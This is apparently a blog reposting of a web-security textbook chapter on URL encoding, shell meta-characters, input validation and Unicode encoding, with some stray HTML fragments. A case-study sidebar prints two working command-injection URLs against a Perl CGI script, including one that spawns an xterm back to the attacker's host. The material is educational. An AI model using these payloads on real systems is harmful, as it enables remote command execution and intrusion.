Wednesday, December 16, 2009

URL Encoding





URL Encoding



By themselves, URLs are nothing but
alphanumeric strings, with some other symbols thrown in. The character set
chosen to express a URL string consists of the following symbols:



style='width:100.0%'>



















Symbols style='font-size:10.5pt;font-family:Arial;color:black'>



Values



Alphanumeric symbols



A-Z, a-z, 0-9



Reserved symbols



; / ? : @ & = + $ , < > # % "



Other special characters



- _ . ! ~ * ' ( ) {} | \^ [ ] `




For the most part, a URL string consists of
letters, numbers, and reserved symbols that have special meaning within the URL
string. Other special characters are found in some URL strings, although they
don't have any special meaning as far as the URL is concerned. However, they
may have special meaning for the Web server receiving the URL or the
application that is requested via the Web server.



Interpretations of some of these special
characters are presented in
lang=EN-GB style='color:#003399'>Table 5-2.



Meta-Characters



Characters such as * and ; and | and ` have
special meanings as meta-characters in applications and scripts. These
characters don't affect the URL in any way, but if they end up making their way
into applications, they may change the meaning of the input altogether and
sometimes create gaping security holes.



style='width:100.0%'>













































lang=EN-GB style='font-size:10.5pt;font-family:Arial'>Table 5-2. Special
Characters and Their Meaning Within a URL


Special Characters style='font-size:10.5pt;font-family:Arial;color:black'>



Interpretation



?



Query String separator. The part of the URL string to the right
of the ? symbol is the Query String.



&



Parameter delimiter. Used to separate name=value parameter pairs
on the Query String.



=



Separates the parameter name from the parameter value while
passing parameters, using the Query String.



+



Is translated into a space.



:



Protocol separator. The portion of the URL string from the
beginning to the : symbol specifies the application layer protocol to be used
when requesting the resource.



#



Used to specify an anchor point within a Web page. For example
the URLs http://www.acme-art.com/index.html#gallery and
http://www.acme-art.com/index.html#purchase takes you to two different
locations within the same page�index.html.



%



Used as an escape character for specifying hexadecimal encoded
characters.



@



Used in mailto: URLs while specifying Internet e-mail addresses
or in passing user login credentials to a password protected resource,
especially over FTP.



~



Used for specifying a user's home directory on a multiuser
system such as Unix. The URL looks like http://server/~user_login_id/ For
example, http://www.cs.purdue.edu/~saumil/maps to the Web page subdirectory
within user saumil's account on the system.




Many meta-characters are interpreted
differently by different Web servers.
lang=EN-GB style='color:#003399'>Table 5-3 describes
how various meta-characters are interpreted inside applications.



Specifying Special Characters on the URL String



The question that arises now is, "What
if we want to specify special characters such as % or ? or & or + without
giving them any special meaning?" For example, suppose we want to pass two
parameters, book=pride&prejudice and shipping=snailmail, on the Query
String. In this case, the URL is:



http://mycheapbookshop.com/purchase.cgi?book=pride&predjudice&shipping=snailmail



style='width:100.0%'>

























lang=EN-GB style='font-size:10.5pt;font-family:Arial'>Table 5-3. Meta-Characters
and Their Meanings


Meta-Character style='font-size:10.5pt;font-family:Arial;color:black'>



Interpretation/Use style='font-size:10.5pt;font-family:Arial;color:black'>



*



The star character is used as a wild card or a file globbing
character. In Unix shell scripts, the asterisk character expands to the list
of filenames present in the current directory.



;



The semicolon character has many meanings in many different
contexts. The most common use of a semicolon is to terminate lines of source
code in languages such as C or Perl. In other contexts, the semicolon is also
used as a command separator, as in Bourne shell scripts and SQL queries.



|



The pipe character, if sneaked through without proper checking,
can play havoc. It is one of the most powerful characters in Unix shell
scripts�second only to the grave accent character `. The pipe joins two
commands by redirecting the standard output of the first command to the
standard input of the second command. In Perl scripts, if a pipe character is
used as a suffix or prefix to the filename when it is opened, the filename is
treated as a system command and is executed by the OS shell. The file handle
then receives the output generated by program that is executed.



`



The grave accent character (commonly called a back-tick or a
back-quote) is used for command output substitution and is the most powerful
character in Unix shell scripting. If a Unix shell command is bounded by
grave accents, the output of the command is substituted for it and returned
to the receiving variable to which the assignment is made. For example,
files=`ls -la` causes the shell variable "files" to be set to the
output of the command ls -la.




style='color:black;display:none'> 



style='width:90.0%'>




Meta-Characters and Input Validation


The single most prominent cause of over 90%
of all Web application vulnerabilities is lack of proper input validation. The
concept of input validation isn't new. During our days of writing Fortran
code in college, the instructor used to perform manual input validation
before giving us credit for the code submitted. One of the programs to be
written was to calculate the natural logarithm of a number. None of the
students' code ever made it past the first input given by the
instructor�"banana"�when the program was expecting a number! When
given unexpected input, the program would crash and dump core. In those days,
little did we realize the importance of proper input validation. Making an
xterm pop out by forcing meta-characters and Unix commands into a Web page
form is perhaps the epitome of elegant Web hacks, attributed entirely to weak
input validation.




The result is an ambiguous URL because there
are three & symbols in the Query String. Most likely, a Web server would
split such a Query String into three parameters instead of two�namely,
book=pride, prejudice= and shipping=snailmail.



If we want to pass the & symbol as part
of the parameter value, the URL specification allows us to express reserved and
special characters in a two-digit hexadecimal encoded ASCII format, prefixed
with a % symbol, as follows:



style='width:100.0%'>































Characters style='font-size:10.5pt;font-family:Arial;color:black'>



Hex Values style='font-size:10.5pt;font-family:Arial;color:black'>



All hex encoded characters



%XX (%00-%FF)



Control characters



%00-%1F, %7F



Upper 8-bit ASCII characters



%80-%FF



Space



%20 or +



Carriage return



%0d



Line feed



%0a




In the preceding example, the ASCII value of
the & symbol is 38 in decimal and 26 in hexadecimal. Therefore, if we want
to express the & symbol, we can use %26 in its place. The URL in the
example would become:



http://mycheapbookshop.com/purchase.cgi?book=pride%26predjudice&shipping=snailmail



Unicode Encoding



Hexadecimal ASCII encoding, while serving
purposes for the most part, isn't broad enough to represent character sets
larger than 256 symbols. Most modern operating systems and applications support
multibyte representations of character sets of languages other than English. Microsoft's
IIS Web server supports URLs containing characters encoded with multibyte UCS
Translation Format (UTF-8), in addition to hexadecimal ASCII encoding.



style='width:90.0%'>




lang=EN-GB style='font-size:16.5pt;font-family:Arial'>The Acme Art, Inc.,
Hack


Let's take a look at two URLs launched by
the attacker on www.acme-art.com, presented in the Part One Case Study. The
URLs are:


http://www.acme-art.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|


http://www.acme-art.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|


The hacker used meta-characters and URL
encoding carefully. The parameter being passed by page= ends up being used as
a filename in the open() function in index.cgi's Perl code. The attacker used
the pipe character around the commands to cause Perl to run them and return
the output. The first URL has three Unix commands separated by the linefeed
character %0A. By hitting the Enter key between each command, the attacker
ran the three commands in succession. The second URL throws an xterm back to
the attacker's system. Note how the attacker sneaked in the ampersand
character as %26, causing the xterm process to be spawned as a background
process.




The Universal Character Set (UCS) is defined
by the International Standards Organization's draft ISO 10646. Although UCS is
maintained by ISO, a separate group was formed (primarily by software vendors)
to allow representation of a variety of character sets with one unified scheme.
This group came to be known as the Unicode Consortium (
style='color:#003399'>http://www.unicode.org). As
standards were developed, both Unicode and UCS decided to adopt a common representation
scheme so that the computing world didn't have to deal with separate standards
for the same thing. UTF-8 encoding is defined in ISO 10646-1:2000 and in RFC
2279. For operating systems that have been designed around the ASCII character
encoding scheme, UTF-8 allows for easy conversion and representation of multibyte
Unicode characters using ASCII mappings.



Without going into the intricacies of how
UTF-8 works, let's look at Unicode encoding from a URL's point of view. Two-byte
Unicode characters are encoded by using %uXXYY, where XX and YY are hexadecimal
values of the higher and lower byte respectively. For the standard ASCII
characters %00 to %FF, the Unicode representation is %u0000 to %u00FF. The Web
server decodes 16 bits at a time when dealing with Unicode encoded symbols.



 





No comments: